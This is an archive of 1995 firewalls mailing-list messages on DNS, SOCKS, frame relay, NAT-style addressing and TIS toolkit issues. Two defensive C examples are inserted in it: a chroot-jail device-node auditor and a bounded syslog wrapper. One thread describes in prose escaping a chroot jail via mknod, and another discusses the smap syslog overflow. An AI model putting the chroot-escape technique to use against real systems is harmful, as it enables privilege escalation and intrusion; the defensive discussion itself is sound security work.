To: firewalls@greatcircle.com
From: harald@emi.gu.se (Harald Astrand)
Subject: DNS forwarding problem
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I have problems getting the DNS to work using internal roots on our network. The internal root servers are set up with a named.boot file:

    primary     .        db.root
    forwarders  x.x.x.x

The x.x.x.x host is the firewall machine on a separate C-net. On the firewall I have a regular (non-root) name-server.

When I try to reach an outside host with nslookup from the internal root I get the following error message:

    can't find x.y.z: Non-existant domain.

I guess this is because the internal root thinks it is authoritative for everything and sees no need to forward the request to the firewall. Is there a way to get this working while still using an internal root? (We use HP-UX and have SOCKS running on the firewall.)

Any help would be very much appreciated.

Regards

Harald
--------------------------------------------------------------------
Harald Åstrand                  Email:
EMI, Sahlgrenska Hospital       Tel. +46 (0)31 - 60 26 82
Röda Stråket 4                  Fax. +46 (0)31 - 60 23 83
S-413 45 Göteborg               Memo: GVS.KOMMUN.VSCHAD
Sweden

From firewalls-owner Sun Sep 3 13:30:04 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA07192 for firewalls-outgoing; Sun, 3 Sep 1995 13:05:17 -0700
Received: from ki1.chemie.fu-berlin.de (ki1.Chemie.FU-Berlin.DE [160.45.24.21]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA07185 for ; Sun, 3 Sep 1995 13:05:11 -0700
Received: by ki1.chemie.fu-berlin.de (Smail3.1.28.1) from odb.rhein-main.de (193.141.47.4) with smtp id ; Sun, 3 Sep 95 22:03 MEST
Received: from [193.141.47.129] by odb.rhein-main.de with smtp (Smail3.1.28.1 #5) id m0spLGP-0007SWC; Sun, 3 Sep 95 22:03 MET DST
X-Sender: maass@odb.rhein-main.de
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 3 Sep 1995 22:10:23 +0200
To: "Roy Schonberg (919) 541-6084"
From: maass@thinkfish.rhein-main.de (Joerg Maass)
Subject: Re: Digital Firewall for Ultrix
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi Roy,

>Anyone know anything about this product?
>
>Other than one SPD from DEC I can't seem to find out much about how it works or
>how well.

This is a product made up of a software/consultancy bundle plus documentation and training. A turnkey solution, basically.
It comes in several possible configurations, depending on your requirements. Additional services are available.

Mail me at Joerg.Maass@frs.mts.dec.com for more info.

Kind regards

Josch
-- 
Am Tiergarten 22        Tel.: +49/69/4990880
D-60316 Frankfurt       Fax : +49/6103/383-157
Germany                 private: maass@thinkfish.rhein-main.de
                        biz.:    Joerg.Maass@frs.mts.dec.com
PGP signature available upon request.

From firewalls-owner Sun Sep 3 14:00:00 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08827 for firewalls-outgoing; Sun, 3 Sep 1995 13:51:33 -0700
Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA08820 for ; Sun, 3 Sep 1995 13:51:29 -0700
Received: from post.demon.co.uk by disperse.demon.co.uk id aa17275; 3 Sep 95 21:10 +0100
Received: from bagpuss.demon.co.uk by post.demon.co.uk id aa09758; 3 Sep 95 21:08 +0100
Received: (karl@localhost) by bagpuss.demon.co.uk (3.1/3.1) id VAA24588; Sun, 3 Sep 1995 21:10:52 +0100
From: Karl Strickland
Message-Id: <199509032010.VAA24588@bagpuss.demon.co.uk>
Subject: Re: syslog overruns and TIS smap
To: Julian Assange
Date: Sun, 3 Sep 1995 21:10:52 +0100 (BST)
Cc: dtynan@fws.ilo.dec.com, firewalls@greatcircle.com
In-Reply-To: <199508312008.GAA17374@suburbia.net> from "Julian Assange" at Sep 1, 95 06:08:01 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1215
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > 
> > > Julian Assange wrote:
> > > 
> > > What happens if I mknod a new hd block device within the chrooted area under
> > > TIS?
> > 
> > You'd need 'root' permission to do that. You don't need root to make
> > an inbound connection to an inside host, however.
> > - Der
> 
> True, but obtaining root isn't necessarily such a hard thing to do. My
> point is that a number of people have stated that despite obtaining root in
> a chrooted() environment you're still protected. The way I have seen chroot()
> calls implemented is the kernel merely sets the process's root inode to
> the inode of the directory passed as the argument. If this is the only
> protection involved you can break out with a mknod.

You're quite right. On BSD4.4, you can bump up your security level so that sensitive devices such as mounted disks & /dev/kmem cannot be opened for write. But - as you say - without that, you're screwed.

-- 
------------------------------------------+-----------------------------------
Mailed using ELM on FreeBSD               | Karl Strickland
PGP 2.3a Public Key Available.            | Internet: karl@bagpuss.demon.co.uk
                                          |

From firewalls-owner Sun Sep 3 14:30:00 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA09125 for firewalls-outgoing; Sun, 3 Sep 1995 14:16:58 -0700
Received: from hawksbill.sprintmrn.com (hawksbill.sprintmrn.com [199.11.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA09118 for ; Sun, 3 Sep 1995 14:16:55 -0700
Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA20292; Sun, 3 Sep 95 17:16:10 -0500
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Message-Id: <9509032216.AA20292@hawksbill.sprintmrn.com>
Subject: Re: Frame-Relay Net Connections
To: mculver@ncelec.com (Mike Culver-Support)
Date: Sun, 3 Sep 1995 17:16:09 -0500 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <9509022139.ZM5494@ncelec.com> from "Mike Culver-Support" at Sep 2, 95 09:39:21 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 1016
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> 
> We all know (and some of us even agree) that a bastion host on a DMZ is the
> best way to protect yourself from the net.
> 
> Anyone have a suggestion for sites that connect to their service provider via a
> Frame Relay connection? In this case, there is a virtual circuit to the service
> provider, but the circuit runs thru a common interface on a router that also
> serves WAN sites that are part of the internal network.
> 

It shouldn't be, that's for sure. :-)

there is absolutely no reason to forsake any amount of security for frame-relay; it should interface with your network in the same manner as any private line, in this case.

- paul

_______________________________________________________________________________
Paul Ferguson                                           Dulcius Ex Asperis
US Sprint                                               tel: 703.689.6828
Managed Network Engineering                  internet: paul@hawk.sprintmrn.com
Reston, Virginia USA                                http://www.sprintmrn.com

From firewalls-owner Sun Sep 3 15:00:00 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA09740 for firewalls-outgoing; Sun, 3 Sep 1995 14:43:51 -0700
Received: from gate.demon.co.uk (gate.demon.co.uk [158.152.1.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA09733 for ; Sun, 3 Sep 1995 14:43:47 -0700
Received: from bagpuss.demon.co.uk by gate.demon.co.uk id aa25571; 2 Sep 95 2:31 GMT-60:00
Received: (karl@localhost) by bagpuss.demon.co.uk (3.1/3.1) id CAA11087; Sat, 2 Sep 1995 02:30:38 +0100
From: Karl Strickland
Message-Id: <199509020130.CAA11087@bagpuss.demon.co.uk>
Subject: Re: linux vs. *bsd for secure networking system
To: Paul McMahan
Date: Sat, 2 Sep 1995 02:30:38 +0100 (BST)
Cc: firewalls@greatcircle.com
In-Reply-To: <199509012356.TAA11927@rudolph.cs.utk.edu> from "Paul McMahan" at Sep 1, 95 07:56:54 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1004
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Hello,
> 
> I know that the linux vs. (free|net)bsd question is the subject of
> ongoing debates outside the realm of firewalls, but I'm interested
> specifically in the security aspects of these operating systems.

Remember, if you go for Linux, you have to decide *which* Linux to go for - there are at least 7 different distributions, some of which are very different. And then, when a hole is discovered, you have to find patches that work with your obscure distribution & version.

FreeBSD has controlled releases, and is developed in a controlled, structured manner; all security-related changes to the system must undergo peer review before a commit is made. This alone would put FreeBSD higher up my list.

-- 
------------------------------------------+-----------------------------------
Mailed using ELM on FreeBSD               | Karl Strickland
PGP 2.3a Public Key Available.            | Internet: karl@bagpuss.demon.co.uk
                                          |

From firewalls-owner Sun Sep 3 23:00:13 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA19472 for firewalls-outgoing; Sun, 3 Sep 1995 22:33:27 -0700
Received: from jpmgate1.jpmorgan.com (jpmorgan.jpmorgan.com [146.149.99.127]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA19465 for ; Sun, 3 Sep 1995 22:33:24 -0700
Received: from tcpg01a.ny.jpmorgan.com by jpmgate1.jpmorgan.com (8.6.12/fma-120691.2); id BAA10453; Mon, 4 Sep 1995 01:32:05 -0400
Received: from smtpgwprod.ny.jpmorgan.com (smtpgwprod.ny.jpmorgan.com [146.149.86.21]) by tcpg01a.ny.jpmorgan.com (8.6.10/8.6.12) with SMTP id BAA17918 for ; Mon, 4 Sep 1995 01:31:57 -0400
Message-ID:
Date: 4 Sep 1995 01:32:20 U
From: "NY Global UNIX GW"
Subject: Undeliverable Mail
X-Mailer: Mail*Link SMTP-MS 3.0.1
Apparently-To:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Unknown Microsoft mail form. Approximate representation follows.

Message: Firewalls-Digest V4 #513
Sent: Sun, Sep 3, 1995 1:09 AM
To: Rattray, A.
On Server: NY Support (L-Z)
Date: Mon, Sep 4, 1995 1:32 AM
Reason: Could not be delivered because the destination Microsoft Mail server could not be found.
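A defender's companion to the chroot()/mknod thread above (Karl Strickland's reply to Julian Assange): the point made there is that a chroot whose tree contains, or can be given, a block or character device node is no boundary at all, since a root process inside it can open the disk or /dev/kmem directly. The audit below walks a jail directory and reports every such node; it is an added example, not code from the TIS toolkit or from any poster, and it assumes a POSIX system with dirent.h and is run against the jail's top directory.

```c
/* jailaudit.c: walk a chroot tree and report block/character device nodes.
 * Added example; not TIS fwtk code and not any poster's patch.
 * Assumes a POSIX system (opendir/readdir/lstat). */
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#define PATH_BUF 4096

/* The node types that let a root process inside the jail reach raw
 * storage or kernel memory: block and character devices. A FIFO,
 * socket or regular file is not a concern for this check. */
int is_device_mode(mode_t mode)
{
    return S_ISBLK(mode) || S_ISCHR(mode);
}

/* Recursively count device nodes under `dir`, printing each one found.
 * lstat() is used so a symlink pointing at the real /dev outside the
 * jail is not followed (it is harmless to the jailed process anyway:
 * the kernel resolves it relative to the jail root).
 * Returns the count, or -1 if `dir` itself cannot be opened. */
int audit_jail(const char *dir)
{
    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;

    int found = 0;
    struct dirent *ent;
    while ((ent = readdir(d)) != NULL) {
        if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
            continue;

        char path[PATH_BUF];
        if (snprintf(path, sizeof path, "%s/%s", dir, ent->d_name) >= (int)sizeof path)
            continue;                       /* path too long to represent; skip */

        struct stat st;
        if (lstat(path, &st) != 0)
            continue;                       /* vanished or unreadable entry */

        if (is_device_mode(st.st_mode)) {
            printf("device node in jail: %s (%s, rdev 0x%lx)\n", path,
                   S_ISBLK(st.st_mode) ? "block" : "char",
                   (unsigned long)st.st_rdev);
            found++;
        } else if (S_ISDIR(st.st_mode)) {
            int sub = audit_jail(path);     /* unreadable subdir (-1) is ignored */
            if (sub > 0)
                found += sub;
        }
    }
    closedir(d);
    return found;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s /path/to/jail\n", argv[0]);
        return 2;
    }
    int n = audit_jail(argv[1]);
    if (n < 0) {
        perror(argv[1]);
        return 2;
    }
    printf("%d device node(s) found under %s\n", n, argv[1]);
    return n == 0 ? 0 : 1;                  /* non-zero exit flags a finding */
}
```

On 4.4BSD the complementary control is the securelevel Karl mentions; this check only tells you whether the tree contains nodes that would matter if that control is absent.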
From firewalls-owner Mon Sep 4 00:30:24 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA20981 for firewalls-outgoing; Mon, 4 Sep 1995 00:14:59 -0700
Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA20964 for ; Mon, 4 Sep 1995 00:14:55 -0700
Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA24396 for Firewalls@greatcircle.com; Mon, 4 Sep 95 02:35:54 -0400
Apparently-To:
Message-Id:
Date: 4 Sep 1995 01:44:39 U
From: "Server #7000007"
Subject: Undeliverable Mail
X-Mailer: Mail*Link SMTP-MS 3.0.2
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Unknown Microsoft mail form. Approximate representation follows.

Message: Firewalls-Digest V4 #513
Sent: Sun, Sep 3, 1995 1:36 AM
To: Harris Tom
On Server: PRC Bellevue NE MS
Date: Mon, Sep 4, 1995 1:44 AM
Reason: Could not be delivered because the destination Microsoft Mail server could not be found.

From firewalls-owner Mon Sep 4 07:30:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04477 for firewalls-outgoing; Mon, 4 Sep 1995 07:24:29 -0700
Received: from blkbox.com (blkbox.com [198.64.53.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA04470 for ; Mon, 4 Sep 1995 07:24:25 -0700
From: wyer@telecheck.com
Received: from TeleCheck.com by blkbox.COM id aa03015; 4 Sep 95 9:20 CDT
Received: from localhost by TeleCheck.com; (5.65/1.1.8.2/01Apr95-0611PM) id AA22869; Mon, 4 Sep 1995 09:21:43 -0500
Message-Id: <9509041421.AA22869@TeleCheck.com>
X-Mailer: exmh version 1.6.2 7/18/95
To: firewalls@greatcircle.com
Cc: wyer@telecheck.com
Subject: Re: Frame-Relay Net Connections
In-Reply-To: paul@hawksbill.sprintmrn.com's message of Sun, 03 Sep 95 17:16:09 -0500. <9509032216.AA20292@hawksbill.sprintmrn.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 04 Sep 95 09:21:43 -0500
X-Mts: smtp
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>> paul@hawksbill.sprintmrn.com supposedly said:
> 
> > 
> > We all know (and some of us even agree) that a bastion host on a DMZ is the
> > best way to protect yourself from the net.
> > 
> > Anyone have a suggestion for sites that connect to their service provider via a
> > Frame Relay connection? In this case, there is a virtual circuit to the service
> > provider, but the circuit runs thru a common interface on a router that also
> > serves WAN sites that are part of the internal network.
> > 
> 
> It shouldn't be, that's for sure. :-)
> 
> there is absolutely no reason to forsake any amount of security for
> frame-relay; it should interface with your network in the same
> manner as any private line, in this case.
> 
> - paul

--------------------

A fairly easy and functional solution, if you have the hardware, is to use Frame Relay switching. For the link that we're bringing up, I simply routed the inbound PVC from our Sprintnet link back out another serial port on our router, through a Synch Modem Eliminator and into a dedicated router. This accomplishes two of our goals:

1. Provide a throttle for Internet traffic by adjusting speed on the Modem Eliminator
2. Prevent access to the primary Frame Relay router from the internet.

We accomplished this with Cisco routers plugged in back-to-back and the frame-relay route command.

+--------------------------------------+--------------------------------------+
| Brett Wyer                           | snail: 5251 Westheimer Road          |
| Manager, Systems Support             |        5th Floor                     |
| TeleCheck International, Inc.        |        Houston, TX 77056             |
| (713) 439-6474                       | i-net: wyer@TeleCheck.com            |
+--------------------------------------+--------------------------------------+
| Stated opinions are my own and do not in any way reflect the opinion of my  |
| employer.                                                                   |
+-----------------------------------------------------------------------------+

From firewalls-owner Mon Sep 4 16:30:04 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA11607 for firewalls-outgoing; Mon, 4 Sep 1995 16:05:15 -0700
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA11466 for ; Mon, 4 Sep 1995 16:04:55 -0700
Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzfui12240; Mon, 4 Sep 1995 19:03:31 -0400
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA19584; Mon, 4 Sep 95 18:56:00 EDT
Date: Mon, 4 Sep 1995 18:55:58 -0400 (EDT)
From: Sick Puppy
Subject: Nasty hackerz having busy weekend
To: firewalls@GreatCircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There are presently some dudes (quite possibly nasty hackerz) in 198.6.1.1, CACHE00.NS.UU.NET, who are doing what looks like slow Satan scans of a variety of different systems on the Internet, including some firewalls. The probes vary from 20 seconds apart to about one minute apart. They have been having a very busy weekend.

I respectfully suggest that you firewalls dudes check your logs and look very carefully for possible intrusions.

I wanted to be holier than thou and bark at UU.net but I can't find a phone number for them. So I am going to send this mail then pee on a tree.

Sorry if this doesn't follow netiquette, but I don't know about that 'cause I am only a dawg.

Sick Puppy, the Cat_Eating_Dawg
SniffMeister of the Stealth Starship Dark Matter
-=:( Chained, whipped, beaten and severely abused in Katherine's Dungeon ):=-
-=:( How could anything that feels so good be so wrong ):=-

From firewalls-owner Mon Sep 4 19:00:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA14090 for firewalls-outgoing; Mon, 4 Sep 1995 18:45:53 -0700
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA14083 for ; Mon, 4 Sep 1995 18:45:49 -0700
Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzfus20461; Mon, 4 Sep 1995 21:44:28 -0400
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA22596; Mon, 4 Sep 95 21:36:58 EDT
Date: Mon, 4 Sep 1995 21:36:57 -0400 (EDT)
From: Sick Puppy
Subject: Re: Nasty hackerz having busy weekend
To: firewalls@GreatCircle.com
In-Reply-To: <9509050054.AA05445@tis.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My sniff and a lick to all those who responded so promptly to a yelp for help. You can scratch real good if you know where the fleas are. The appropriate d00dz have now been informed.
Sick Puppy, the Cat_Eating_Dawg
clueless country dawg
-=:( Chained, whipped, beaten and severely abused in Katherine's Dungeon ):=-
-=:( How could anything that feels so good be so wrong ):=-

From firewalls-owner Mon Sep 4 23:30:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA18014 for firewalls-outgoing; Mon, 4 Sep 1995 23:21:03 -0700
Received: from arl-img-5.compuserve.com (arl-img-5.compuserve.com [198.4.7.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA18007 for ; Mon, 4 Sep 1995 23:21:01 -0700
Received: by arl-img-5.compuserve.com (8.6.10/5.950515) id CAA16104; Tue, 5 Sep 1995 02:19:30 -0400
Date: 05 Sep 95 02:17:35 EDT
From: "matt (IEZ AG)" <100632.1345@compuserve.com>
To: firewalls-mailing-list
Subject: firewall with only one IP address ???
Message-ID: <950905061735_100632.1345_BHL70-1@CompuServe.COM>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all,

we have one question:

Our firm now wants to connect to the internet, but we will get only one official IP address. At first we believed this would be no problem, because we'll use the 10.0.0.0 net as our internal network and we will be able to manage the connections over proxies. So we hoped a firewall could do two things: protect our private network and connect every internal host to the internet.

But unfortunately, our router needs our only official IP address, and the firewall can only get a 10.x.y.z address. The problem is that the firewall behind the router cannot perform the connection between the internet and our private net because it isn't reachable directly from the internet, or are we wrong?

Is there another possibility to install the proxies? Ok, we could use a LINUX workstation as both the router and the application gateway, but we're not very happy with this idea for several reasons. First we'll try to ask you: does anyone have any other good idea?

TIA

rolf matt

From firewalls-owner Tue Sep 5 00:32:22 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA18644 for firewalls-outgoing; Tue, 5 Sep 1995 00:29:40 -0700
Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA18637 for ; Tue, 5 Sep 1995 00:29:35 -0700
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id RAA06677; Tue, 5 Sep 1995 17:23:16 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma006673; Tue Sep 5 17:23:06 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA12116; Tue, 5 Sep 1995 17:28:38 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9509050728.AA12116@citecub.citec.qld.gov.au>
Subject: Re: firewall with only one IP address ???
To: 100632.1345@compuserve.com (matt)
Date: Tue, 5 Sep 95 17:28:36 EST
Cc: firewalls@greatcircle.com
In-Reply-To: <950905061735_100632.1345_BHL70-1@CompuServe.COM>; from "matt" at Sep 5, 95 2:17 am
X-Mailer: ELM [version 2.3 PL11]
content-length: 1343
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> 
> Hi all,
> 
> we have one question:
> Our firm now wants to connect to the internet, but we will get only
> one official IP-address. First, we believed this would be no problem
> because we'll use the 10.0.0.0 net as our internal network and we
> will be able to manage the connections over proxies.
> So we hoped a firewall could do two things: protect our private network
> and connect every internal host against the internet.
> But unfortunately, our router just needs our only official
> IP-address, and the firewall can only get a 10.x.y.z address.

This should not be required. Your ISP should provide an IP address for the link from their router to yours. Then you use your allocated IP on the firewall net and the 10.*.*.* behind the bastion.

A picture:

Assume:
  ISP uses net a.b.c for connections
  You have been allocated f.g.h
  Single homed bastion

                    ISP network
              -------------------
                        |
                   ISP router  a.b.c.d
                        |
                        |
                     a.b.c.e
                   Your router  f.g.h.1
                        |
                    f.g.h net
              ------------------
                  |          |
              f.g.h.2     f.g.h.3
              bastion     router  10.0.0.1
                             |
                             V
                         inside net

Of course there are many ways to build your firewall but none of them should require you to use your allocated net on the ISP-side of your router.

Colin

From firewalls-owner Tue Sep 5 02:00:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA19667 for firewalls-outgoing; Tue, 5 Sep 1995 01:37:38 -0700
Received: from virgo.ai.net (virgo.ai.net [198.69.44.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA19658 for ; Tue, 5 Sep 1995 01:37:31 -0700
Received: from aries.ai.net (aries.ai.net [198.69.44.1]) by virgo.ai.net (8.6.11/8.6.12) with ESMTP id EAA17660; Tue, 5 Sep 1995 04:53:39 -0400
Received: (from nc@localhost) by aries.ai.net (8.6.11/8.6.12) id EAA14904; Tue, 5 Sep 1995 04:35:42 -0400
Date: Tue, 5 Sep 1995 04:35:42 -0400 (EDT)
From: Network Coordinator
To: Colin Campbell
cc: matt <100632.1345@compuserve.com>, firewalls@GreatCircle.COM
Subject: Re: firewall with only one IP address ???
In-Reply-To: <9509050728.AA12116@citecub.citec.qld.gov.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Of course there are many ways to build your firewall but none of them
> should require you to use your allocated net on the ISP-side of your
> router.

I think the gentleman is saying that he has only *1* IP Address. Not an IP net.

-Jerry.
From firewalls-owner Tue Sep 5 05:00:23 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA21633 for firewalls-outgoing; Tue, 5 Sep 1995 04:39:16 -0700
Received: from victoria.schnet.edu.au (victoria.schnet.edu.au [203.2.135.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA21626 for ; Tue, 5 Sep 1995 04:39:11 -0700
Received: (from lukeh@localhost) by victoria.schnet.edu.au (8.6.9/8.6.9) id VAA23596 for firewalls@greatcircle.com; Tue, 5 Sep 1995 21:37:39 +1000
Date: Tue, 5 Sep 1995 21:37:39 +1000
From: Luke Howard
Message-Id: <199509051137.VAA23596@victoria.schnet.edu.au>
To: firewalls@greatcircle.com
Subject: syslog() and TIS on Nextstep
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I was wondering if anyone has had any experience compiling the firewall toolkit under Nextstep (not an ideal platform for this kinda stuff I know, but we're using it for reasons outside my control). I've managed to get it to compile, after changing a couple of things in Makefile.config and firewall.h, and it appears to work fine.

I'm not sure to what extent Nextstep is vulnerable to the syslog() problem - I tried one of the few programs floating around that tests for the vulnerability, and I get seg. faults when 8k or more is passed to it. (NS3.3 on i486)

I modified smap.c to not accept to/from lines >1024 bytes, and I linked the entire toolkit against newlog-1.0, which supposedly does bounds checking on syslog() - getting it to compile on Nextstep was a bit awkward (had to grab sys/cdefs.h off FreeBSD, define STDERR_FILENO or something I can't quite remember :)) but it (again) appears to be working fine.

Does anyone have any comments on this? I'm admittedly a newbie when it comes to C :)

regards, luke.
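The two mitigations Luke describes, capping To:/From: header lines at 1024 bytes in the relay and putting a bounds check in front of syslog(), look like this in one place. This is an added example, not his patch, not TIS fwtk code and not newlog; the limits are assumptions: HDR_MAX mirrors the 1024-byte cap he mentions, and LOG_MAX has to stay well below the fixed buffer your platform's syslog(3) formats into, which also carries the timestamp and hostname prefix libc prepends.

```c
/* boundlog.c: bounded logging for a mail relay such as smap.
 * Added example, not fwtk or newlog code. Size limits are assumptions. */
#define _XOPEN_SOURCE 700
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

#define HDR_MAX 1024   /* longest To:/From: line the relay will accept (assumed) */
#define LOG_MAX  512   /* longest message text handed to syslog(3) (assumed)    */

/* Format fmt/ap into buf, never writing past bufsz bytes.
 * Returns 1 if the result had to be truncated, 0 otherwise. */
int bounded_vformat(char *buf, size_t bufsz, const char *fmt, va_list ap)
{
    int n = vsnprintf(buf, bufsz, fmt, ap);
    if (n < 0) {                /* encoding error: log nothing rather than garbage */
        buf[0] = '\0';
        return 0;
    }
    return (size_t)n >= bufsz;  /* vsnprintf reports the length it wanted */
}

int bounded_format(char *buf, size_t bufsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int truncated = bounded_vformat(buf, bufsz, fmt, ap);
    va_end(ap);
    return truncated;
}

/* Replacement for a bare syslog() call: the text is assembled in a
 * fixed-size buffer here and passed under a constant "%s" format, so the
 * libc formatter never sees more than LOG_MAX bytes of peer-supplied text
 * and never interprets a '%' inside it. */
void bounded_syslog(int priority, const char *fmt, ...)
{
    char msg[LOG_MAX];
    va_list ap;
    va_start(ap, fmt);
    int truncated = bounded_vformat(msg, sizeof msg, fmt, ap);
    va_end(ap);
    syslog(priority, "%s%s", msg, truncated ? " [truncated]" : "");
}

/* Header-line policy from the thread: a To:/From: line longer than HDR_MAX
 * bytes is rejected before it reaches the logger or the real MTA.
 * Returns 1 if the line is acceptable, 0 if it must be rejected. */
int header_line_ok(const char *line)
{
    return strnlen(line, HDR_MAX + 1) <= HDR_MAX;
}

int main(void)
{
    /* Constructed sample input: one sane header and one absurdly long one. */
    const char *sample = "From: postmaster@example.invalid";
    char oversized[HDR_MAX + 100];
    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    openlog("boundlog-example", LOG_PID, LOG_MAIL);
    if (header_line_ok(sample))
        bounded_syslog(LOG_INFO, "accepted header: %s", sample);
    if (!header_line_ok(oversized))
        bounded_syslog(LOG_WARNING, "rejected %zu-byte header line",
                       strlen(oversized));
    closelog();
    return 0;
}
```

Note that the wrapper only limits what the application hands to syslog(); if the platform's libc syslog() is itself the overflowing function, as the thread suspects for Nextstep, the cap must be small enough that message plus prefix fits its internal buffer, or the libc routine must be replaced.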
From firewalls-owner Tue Sep 5 06:00:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA22196 for firewalls-outgoing; Tue, 5 Sep 1995 05:41:00 -0700 Received: from gateway1.DHL.COM (gateway1.DHL.COM [137.98.208.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA22182 for ; Tue, 5 Sep 1995 05:40:56 -0700 Received: from cdgco6.cdg-co.FR.DHL.COM by gateway1.DHL.COM id aa19784; 5 Sep 95 5:39 PDT Received: from cdgco4.cdg-co.fr.DHL.COM by cdgco6.cdg-co.fr.DHL.COM with SMTP (DHLGMS 4.07-DSI) id AA199314697; Tue, 5 Sep 1995 14:38:17 +0200 Received: by cdgco4.cdg-co.fr.DHL.COM (DHLGMS 4.07-DSI) id AA29572; Tue, 5 Sep 1995 14:39:17 +0200 Message-Id: <9509051239.AA29572@cdgco4.cdg-co.fr.DHL.COM> From: Pascal MELCHIOR Date: Tue, 5 Sep 1995 14:39:17 +0200 To: firewalls@greatcircle.com Subject: USING SOCKS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk %UNIPLEX %TO firewalls@greatcircle.com %FROM pmelchio %SYSTEM DHLNET %SUBJECT USING SOCKS %VERIFY y %REGISTERED y %DATE 05/09/95 14:39 %REFERENCE 345634

OBJECT: using SOCKS

We have some PCs with a Netscape client, and we want to use the SOCKS software on an HPUX machine.

Is it possible to mask the name of the DNS server to the client PC, if I define this line in the include/socks.h file:

    #define SOCKS_DEFAULT_NS "a.b.c.d"

